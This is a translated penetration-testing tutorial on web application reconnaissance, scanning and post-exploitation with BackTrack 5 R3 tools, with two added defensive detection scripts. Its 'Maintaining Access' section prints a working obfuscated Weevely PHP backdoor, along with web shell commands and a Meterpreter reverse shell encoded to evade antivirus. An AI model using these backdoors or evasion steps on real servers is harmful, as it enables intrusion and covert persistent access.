INTRODUCTION

Today, as many of us pen-testers know, the analysis of web applications plays a very important role in a security evaluation and/or penetration test, because it gives us the relevant information about the web application, such as the plugins it uses and the type of CMS (Joomla, WordPress or other). This helps us determine which exploit we should use, or see exactly how to exploit the vulnerabilities that can appear while performing the penetration test.

Penetration tests are also used to determine the security level of a computer, a computer network (a LAN, Local Area Network, or a WLAN, Wireless Local Area Network) or web applications, among others, by simulating computer attacks identical to those a Black Hat Hacker or Cracker would carry out, but without compromising the information or the availability of services. This is done in order to identify the potential threats in IT systems before an attacker (external or internal) discovers them. This process is also known as Ethical Hacking.

To perform this penetration testing procedure, BackTrack 5 R3 is used: a Linux distribution based on Ubuntu, made specifically to carry out these tests, as it comes with a set of very important tools that do much of the work of getting all the necessary information about web applications, among other things.

BackTrack Wiki: http://www.backtrack-linux.org/wiki/
Download: http://www.backtrack-linux.org/downloads/
METHODS OF ANALYSIS OF WEB APPLICATIONS

1. NETWORK MAPPING

Network mapping is the study of the physical connectivity of a network; Internet mapping is the study of the physical connectivity of the Internet. Network mapping is often used to determine the servers and operating systems running on the network. The law and ethics of port scanning are complex: a scan of a network can be detected by people or by automated systems, and is treated as a malicious act. The BackTrack suite includes NMAP, a tool we all know for its power and effectiveness, which is very useful for carrying out this method, so important in a web audit.

• NMAP: Nmap ("Network Mapper") is an open source tool for network exploration and security auditing. Nmap uses raw IP packets in novel ways to determine what hosts are available on a network, what services (application name and version) those hosts offer, what operating systems (and versions) they run, what type of packet filters or firewalls are in use, and dozens of other characteristics.

Use:
nmap www.sitio-web.com
nmap 192.168.1.1
• NETIFERA: Netifera is a network scanner that can perform passive scanning (analysing a pcap file or sniffing the live network) and active analysis (port scanning of a target). It identifies the hosts on the network. The project offers many advantages to security developers and researchers who want to implement new tools, as well as to the community of users of those tools. This tool is included in BackTrack at the following location: Applications - BackTrack - Information Gathering - Network Analysis - Identify Live Hosts - Netifera. Usage is very easy: just type the web address where it says "Type Address", press Enter, and the target websites and IPs to be audited appear. In this case I used the website www.paypal.com, on which I ran Reverse Lookup, TCP Connect Scan, UDP Scan, Crawler, NS Lookup and Brute Force Host Name.
2. INFORMATION GATHERING

The first phase of a security assessment focuses on gathering as much information as possible about the web application. Information gathering is the most critical step of a web application security test. It can be accomplished in many different ways: using public tools (search engines, scanners), or by sending simple or specially crafted HTTP requests, it is possible to force the application to leak information, for example through error messages or the disclosure of the versions and technologies in use. There are basically two types of information gathering, active and passive. In passive gathering the attacker does not communicate directly with the target and tries to collect information that is already available on the Internet, while in active gathering the attacker is in direct contact with the target while collecting information.

• THEHARVESTER: theHarvester is a tool to collect e-mail accounts, user names and host names or subdomains from different public sources such as search engines and PGP key servers.

Use:
/pentest/enumeration/theharvester# ./theHarvester.py -d sitio-web.com -l 500 -b google
/pentest/enumeration/theharvester# ./theHarvester.py -d sitio-web.com -b pgp
/pentest/enumeration/theharvester# ./theHarvester.py -d sitio-web.com -l 200 -b linkedin

• MALTEGO: Maltego is a tool based on open-source intelligence and forensics that shows how pieces of information are connected to each other. With Maltego we can find the relationships people commonly have today, including their social profiles (Facebook, Twitter), mutual friends, companies related to the information gathered, and websites. If we collect information about an infrastructure, we can map the relationships between domains and DNS names.

Location: Applications - Backtrack - Information Gathering - Network Analysis - DNS Analysis - Maltego
EXAMPLE OF MALTEGO ARCHITECTURE (figure)
3. CMS IDENTIFICATION

• BLINDELEPHANT: BlindElephant is a Python-based tool used for web application fingerprinting. The tool is fast, uses little bandwidth and is highly automated.

Use:
/pentest/web/blindelephant/src/blindelephant# ./BlindElephant.py http://sitio-web.com/ cms

• CMS-EXPLORER: CMS-Explorer is also used for fingerprinting web applications; it identifies the type of CMS in use, so that the attack can be planned according to the information obtained.

Use:
/pentest/enumeration/web/cms-explorer# ./cms-explorer.pl -url http://sitio-web.com/ -type cms
5. OPEN SOURCE ANALYSIS

Open-source analysis is performed using tools like GHDB, revhosts and XSSed. GHDB (Google Hacking Database) and XSSed are websites, while revhosts is a console tool.

• GHDB: Google Hacking Database. The exploit-db team maintains a database of Google dorks that can greatly help pen-testers in information gathering. We can use the dorks to find certain types of vulnerable servers or other information. For example, a Google dork like "Microsoft-IIS/6.0" intitle:index.of can be used to find servers running Microsoft IIS 6.0.

• XSSED: http://www.xssed.com/ is a website that contains a list of websites vulnerable to Cross Site Scripting (XSS), submitted by various authors. It can be opened from: Applications - Backtrack - Information Gathering - Web Application Analysis - Open Source Analysis - Xssed.

6. WEB CRAWLERS

In this last category of web analysis the famous crawlers are used; they help a lot in listing the "hidden" files and folders inside a web server. The BackTrack suite has many tools for this type of analysis, such as DIRB, Golismero, SQLScan, Deblaze and WebShag.

• WEBSHAG: Webshag is a tool written in Python that combines features useful for auditing web servers, such as web crawling, URL scanning and file fuzzing. Webshag can be used to scan a web server over HTTP or HTTPS, through a proxy and using HTTP authentication (Basic and Digest).
It also proposes innovative IDS-evasion features intended to make correlating the requests at the application side more complicated (for example, using a random proxy for each HTTP request). It can be opened from Applications - BackTrack - Information Gathering - Web Application Analysis - Web Crawlers - WebShag Gui.

• DIRBUSTER: DirBuster is a Java application designed to brute force directory and file names on web servers/applications. It is often the case that what looks like a web server in a default installation state actually is not, and has pages and applications hidden within it; DirBuster tries to find these. DirBuster comes with a total of 9 different wordlists, which makes it extremely effective at finding hidden files and directories. And if that were not enough, DirBuster also has the option of pure brute force. It can be found at the following location: Applications - BackTrack - Vulnerability Assessment - Web Application Assessment - Web Application Fuzzers - DirBuster
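The directory and file brute forcing that DirBuster performs leaves a distinctive trace on the server side: one client producing a burst of 404 responses for many different paths in a short time. The following script is an added example, not part of the original tutorial or of DirBuster, that picks that pattern out of Apache/nginx combined-format access logs. The log lines, IP addresses, user agent, threshold and window are constructed for the example; the logic generalizes to any client, not just DirBuster, that walks a wordlist against a server.

```python
"""Flag DirBuster-style directory brute forcing in combined-format access logs."""
import re
from collections import defaultdict, deque
from datetime import datetime

# Apache/nginx "combined" log format: ip ident user [time] "request" status bytes "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)


def parse_line(line):
    """Return (ip, timestamp, path, status) or None for lines that do not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return m["ip"], ts, m["path"], int(m["status"])


def find_bruteforcers(lines, threshold=10, window_s=60):
    """Return {ip: (max_404s_in_window, distinct_paths)} for clients whose 404s
    within any window_s-second window reach threshold.
    Lines must be in chronological order per client, as access logs are."""
    recent = defaultdict(deque)  # ip -> (ts, path) of recent 404s, oldest first
    flagged = {}
    for line in lines:
        parsed = parse_line(line)
        if parsed is None or parsed[3] != 404:
            continue
        ip, ts, path, _ = parsed
        q = recent[ip]
        q.append((ts, path))
        while (ts - q[0][0]).total_seconds() > window_s:  # slide the window forward
            q.popleft()
        if len(q) >= threshold:
            distinct = len({p for _, p in q})
            prev = flagged.get(ip, (0, 0))
            flagged[ip] = (max(prev[0], len(q)), max(prev[1], distinct))
    return flagged


# Constructed sample: one scanner (TEST-NET address) walks a small wordlist in
# twelve seconds, while an ordinary visitor produces a single 404 for a favicon.
SCANNER = "203.0.113.7"
PROBED_PATHS = ["/admin/", "/backup/", "/old/", "/test/", "/.git/", "/config.php",
                "/db/", "/tmp/", "/upload/", "/logs/", "/dev/", "/phpmyadmin/"]
SAMPLE_LOG = [
    f'{SCANNER} - - [10/Mar/2013:14:02:{i:02d} +0000] "GET {p} HTTP/1.1" 404 209 '
    f'"-" "constructed-scanner/1.0"'
    for i, p in enumerate(PROBED_PATHS)
] + [
    '192.0.2.10 - - [10/Mar/2013:14:02:05 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '192.0.2.10 - - [10/Mar/2013:14:02:09 +0000] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, (hits, paths) in find_bruteforcers(SAMPLE_LOG).items():
        print(f"{ip}: {hits} x 404 across {paths} distinct paths within 60s")
```

The detection keys on the response pattern rather than on the User-Agent string, because the agent string is trivially changed while the flood of 404s for distinct paths is inherent to the technique; the distinct-path count separates a wordlist walk from a single broken link being retried.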
7. VULNERABILITY ASSESSMENT AND EXPLOITATION

The vulnerability assessment stage is where we can probe our target for flaws, but before a vulnerability assessment, gathering information about the target is much more useful. The information gathering phase remains the key step before any further attack, simply because it makes the job easier: for example, in the first stage, scanners such as BlindElephant were used to identify the CMS and find the version of the installed application. Now, in the vulnerability assessment stage, we can use many tools (scanners) that help a lot in finding vulnerabilities in the specific web server.

• JOOMSCAN: A Perl-based tool used to identify known vulnerabilities such as SQL Injection, XSS and others on web servers based on the Joomla platform.
• Detects the version of Joomla! that is running.
• Scans for and locates known vulnerabilities in Joomla! and its extensions.
• Reports in text or HTML format.
• Allows immediate updating of the scanner via svn.
• Detects vulnerability types: SQL injection, LFI, RFI, XSS and others.

It can be opened from:
/pentest/web/joomscan# ./joomscan.pl -u www.sitio-web.com

• SQLMAP: A tool that helps automate the process of detecting and exploiting SQL injection vulnerabilities, allowing full access to the database of the web server.

It can be opened from:
/pentest/database/sqlmap# ./sqlmap.py -u http://www.sitio-web.com/ --dbs
• FIMAP: A small tool written in Python that can find, prepare, audit and automatically exploit Remote File Inclusion bugs in web applications. It is currently under development, but it is usable. The goal of fimap is to improve the quality and security of your website.

It can be opened from:
/pentest/web/fimap# ./fimap.py -u http://localhost/test.php?file=bang&id=23
/pentest/web/fimap# ./fimap.py -g -q noticias.php?id=
• SHODAN: This is another site assessment tool, particularly useful for pentesters. It can be used to collect intelligence about devices that are connected to the Internet; we can, for example, check whether network devices such as routers, VoIP phones, printers, cameras, etc., are exposed. To find out whether a service is running on a domain, the syntax would be:

• hostname:target.com port:80,21,22

If we simply want the results for the host name, the syntax would be:

• hostname:target.com

• W3AF: w3af is a web application security audit tool, basically divided into several plugin categories such as Attack, Audit, Exploit, Discovery, Brute Force and Evasion, which can all be used as needed. Each category comes with several plugins; for example, we can select the XSS audit plugin if that particular audit is required. It can be opened from Applications - BackTrack - Vulnerability Assessment - Web Application Assessment - Web Vulnerability Scanners - w3af
Once the analysis is complete, w3af shows detailed information about the vulnerabilities found in the specified website, which can then be used for further exploitation.
• UNISCAN: A web vulnerability scanner, aimed at information security, that finds vulnerabilities in web systems. It is licensed under the GNU General Public License 3.0 (GPL 3). Uniscan is written in Perl, has easy handling of regular expressions and is also multi-threaded.

Features:
• Identification of system pages through a web crawler.
• Testing of pages found via the GET method.
• Testing of forms found via the POST method.
• Support for SSL requests (HTTPS).
• Proxy support.
• Generating a list of sites via Google.
• Generating a list of sites via Bing.
• GUI client written in Perl Tk.

It can be downloaded from the following link: http://uniscan.sourceforge.net/?page_id=7

It can be opened from:
./uniscan.pl -u http://www.sitio-web.com/ -qweds

• NIKTO: A web server scanner which performs comprehensive tests against web servers for multiple items, including over 6500 potentially dangerous files/CGIs, checks for outdated versions of over 1250 servers, and version-specific problems on over 270 servers. It also checks server configuration items, such as the presence of multiple index files and HTTP server options. Nikto is a robust project that has been several years in development and is constantly evolving. Some of the most interesting features of this tool include the ability to generate reports in various formats, integration with LibWhisker (Anti-IDS) and integration with Metasploit, among others. It can be opened from Applications - BackTrack - Vulnerability Assessment - Web Application Assessment - Web Vulnerability Scanners - Nikto

Use:
/pentest/web/nikto# ./nikto.pl -host www.sitio-web.com

8. MAINTAINING ACCESS

Once we have access to the website (the target), we need to maintain that access for future use, so that we do not have to start from scratch again and again. To do this, we can upload web backdoors or shells to the web page. The encoding of the backdoor is also important, so as not to create "noise" when it is loaded on the server; otherwise administrators can easily detect and remove the backdoors. The BackTrack 5 R3 suite incorporates good tools to carry out this process, which are:

• WEEVELY: An essential tool for the post-exploitation of web applications, which can be used as a backdoor or as a web shell to manage web accounts. Weevely looks for functions such as system(), passthru(), popen(), exec(), proc_open(), shell_exec(), pcntl_exec(), perl->system() and python_eval() that are enabled on the remote server and uses them. The following code is an example of the backdoor code generated by Weevely.
-------------------------------------------------------------------------------------------------------------------
eval(base64_decode(cGFyc2Vfc3RyKCRfU0VSVkVSWydIVFRQX1JFRkVSRVInXSwkYSk7IGlmKHJlc2V0KCRhKT09J2luJyAmJiBjb3VudCgkYSk9PTkpIHsgZWNobyAnPGZvc2VjPic7ZXZhbChiYXNlNjRfZGVjb2RlKHN0cl9yZXBsYWNlKCIgIiwgIisiLCBqb2luKGFycmF5X3NsaWNlKCRhLGNvdW50KCRhKS0zKSkpKSk7ZWNobyAnPC9mb3NlYz4nO30=));
-------------------------------------------------------------------------------------------------------------------

It can be opened from Applications - BackTrack - Maintaining Access - Web BackDoors - Weevely

Use:
/pentest/backdoors/web/weevely# ./weevely.py generate password /root/back.php
/pentest/backdoors/web/weevely# ./weevely.py http://www.sitio-web.com/back.php password

• WEBACOO: WeBaCoo (Web Backdoor Cookie) is a backdoor that provides a terminal connection over HTTP between the client and the web server. It is a post-exploitation tool for maintaining access to a (compromised) web server. It was designed to operate under the radar of modern up-to-date AV, NIDS, IPS, network firewalls and application firewalls, providing a stealthy mechanism to execute commands on the compromised server. The obfuscated file carries the communication in HTTP Cookie headers, validating the requests and responses exchanged with the web server. WeBaCoo provides a way to generate the PHP backdoor code using predefined payloads. It also offers a "terminal" mode in which the user can establish a remote connection to the server and execute commands with the privileges of the web service. The download is available from Github: https://github.com/anestisb/WeBaCoo

Options:

1) Create the obfuscated backdoor backdoor.php with the default settings:
• ./webacoo.pl -g -o backdoor.php

2) Create the de-obfuscated backdoor raw-backdoor.php using the "transit" function:
• ./webacoo.pl -g -o raw-backdoor.php -f 4 -r

3) Establish a "terminal" connection to the remote host using the default settings:
• ./webacoo.pl -t -u http://127.0.0.1/backdoor.php

4) Establish a "terminal" connection to the remote host, configuring some arguments:
• ./webacoo.pl -t -u http://127.0.0.1/backdoor.php -c "Test-Cookie" -d "TTT"
5) Establish a "terminal" connection to the remote host via an HTTP proxy:
• ./webacoo.pl -t -u http://10.0.1.13/backdoor.php -p 127.0.0.1:8080

6) Establish a "terminal" connection to the remote host via an HTTP proxy with basic authentication:
• ./webacoo.pl -t -u http://10.0.1.13/backdoor.php -p user:password:10.0.1.8:3128

7) Establish a "terminal" connection to the remote host via Tor and log the activity:
• ./webacoo.pl -t -u http://example.com/backdoor.php -p tor -l webacoo_log.txt

• MSFPAYLOAD: Metasploit can be used to create backdoors that can then be used to maintain access to the web server. This is done with the help of msfpayload. The steps to create a backdoor with msfpayload are as follows. We have to select the payload we will use to get a Meterpreter shell through a reverse TCP connection. The command would be:

msfpayload windows/meterpreter/reverse_tcp

This payload has two parameters: LHOST (our IP) and LPORT, to select the port that we will use. The "R" outputs the payload in RAW format so that we can then encode it.

msfpayload windows/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=1234 R

This command creates the payload, but it has to be encoded to avoid antivirus detection; for that we can use msfencode, piping ("|") the output of msfpayload into it:

msfpayload windows/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=1337 R | msfencode -e x86/shikata_ga_nai -t exe > bucker.exe

-e specifies the encoder to use, in this case I'm using shikata_ga_nai, and -t the type of output file (exe). If we want to see the list of encoders available in MSF, we use the following command:

msfencode -l
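The Weevely stub shown above is a typical instance of the eval(base64_decode(...)) construction that web backdoors use to hide their real logic from a casual look at the file, and that same construction is what the owner of a server can look for when reviewing uploaded PHP. The following script is an added example, not part of the original tutorial or of Weevely or WeBaCoo: it finds such literals statically, decodes them (tolerating the whitespace wrapping visible in the slide and missing padding), and flags the shell-capable function names the text lists together with request-controlled inputs such as the Referer header or a cookie that the decoded code reads. The sample PHP files, paths and decoded contents are constructed and inert; nothing in them is ever executed.

```python
"""Static triage of PHP files for eval(base64_decode(...)) backdoor stubs."""
import base64
import re
from dataclasses import dataclass, field

# Shell-capable functions the text lists (plus eval/assert, which execute code).
# Matched as bare words, because PHP can call a function through a string:
#   $f = 'system'; $f($cmd);
DANGEROUS_FUNCS = ("system", "passthru", "popen", "exec", "proc_open",
                   "shell_exec", "pcntl_exec", "eval", "assert")
# Request-controlled inputs a stub typically reads its real payload from
# (Weevely uses the Referer header, WeBaCoo uses cookies).
REQUEST_SOURCES = ("$_SERVER['HTTP_REFERER']", "$_GET", "$_POST",
                   "$_COOKIE", "$_REQUEST")
# eval(base64_decode(<literal>)): the literal may be quoted or not, and may
# contain whitespace when the file was wrapped across lines.
EVAL_B64 = re.compile(
    r"""eval\s*\(\s*base64_decode\s*\(\s*(['"]?)([A-Za-z0-9+/=\s]+)\1\s*\)\s*\)""",
    re.IGNORECASE,
)


@dataclass
class Finding:
    path: str
    offset: int            # byte offset of the eval( in the source
    decoded_preview: str   # first 80 chars of the decoded literal
    indicators: list = field(default_factory=list)


def decode_b64_loose(blob):
    """Decode base64 that may be whitespace-wrapped or missing padding; '' if invalid."""
    compact = re.sub(r"\s+", "", blob)
    compact += "=" * (-len(compact) % 4)
    try:
        return base64.b64decode(compact, validate=True).decode("utf-8", "replace")
    except ValueError:  # binascii.Error is a ValueError subclass
        return ""


def scan_php_source(path, source):
    """Return one Finding per eval(base64_decode(...)) in source, with its indicators."""
    findings = []
    for m in EVAL_B64.finditer(source):
        decoded = decode_b64_loose(m.group(2))
        indicators = ["eval(base64_decode(...))"]
        indicators += [f for f in DANGEROUS_FUNCS
                       if re.search(r"\b%s\b" % re.escape(f), decoded)]
        indicators += [s for s in REQUEST_SOURCES if s in decoded]
        findings.append(Finding(path, m.start(), decoded[:80], indicators))
    return findings


def triage(files):
    """Scan a {path: source} mapping and keep only the files with findings."""
    return {p: f for p, src in files.items() if (f := scan_php_source(p, src))}


def _b64(text):
    return base64.b64encode(text.encode()).decode()


def _wrap(b64, width=24):
    """Split a literal with spaces, mimicking line-wrapped text."""
    return " ".join(b64[i:i + width] for i in range(0, len(b64), width))


# Constructed samples (inert: the decoded text only names things, it calls nothing).
SAMPLE_FILES = {
    # Legitimate base64_decode without eval: must not be flagged.
    "themes/site/header.php":
        "<?php $logo = base64_decode('aW1hZ2U='); echo $logo; ?>",
    # Stub whose decoded literal names a shell function and reads a cookie.
    "uploads/back.php":
        "<?php eval(base64_decode('"
        + _b64("$f = 'system'; $c = $_COOKIE['cmd']; /* constructed */") + "')); ?>",
    # Unquoted, whitespace-wrapped literal, as the stub appears in the slide above.
    "uploads/wrapped.php":
        "<?php eval(base64_decode("
        + _wrap(_b64("parse_str($_SERVER['HTTP_REFERER'],$a); /* constructed */")) + ")); ?>",
}

if __name__ == "__main__":
    for path, findings in triage(SAMPLE_FILES).items():
        for f in findings:
            print(f"{path} @ {f.offset}: {', '.join(f.indicators)} -> {f.decoded_preview!r}")
```

Run against a real document root this gives a short list of files to inspect by hand; base64_decode on its own is common in legitimate code (images, tokens), so the eval wrapper plus the decoded-content indicators, not the decoding alone, is what makes a hit worth attention.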
9. CONCLUSION

These are only a few of the methods you can follow to exploit vulnerabilities in a web application. Once we have the information about our target, we try to perform a vulnerability assessment in order to learn which exploits can be used. Once that is done, we exploit the vulnerabilities and, if necessary, upload a backdoor, but before that, the backdoor must be encoded to avoid detection. I hope this helps you with finding vulnerabilities, exploiting them and maintaining access to your target.

Greetings.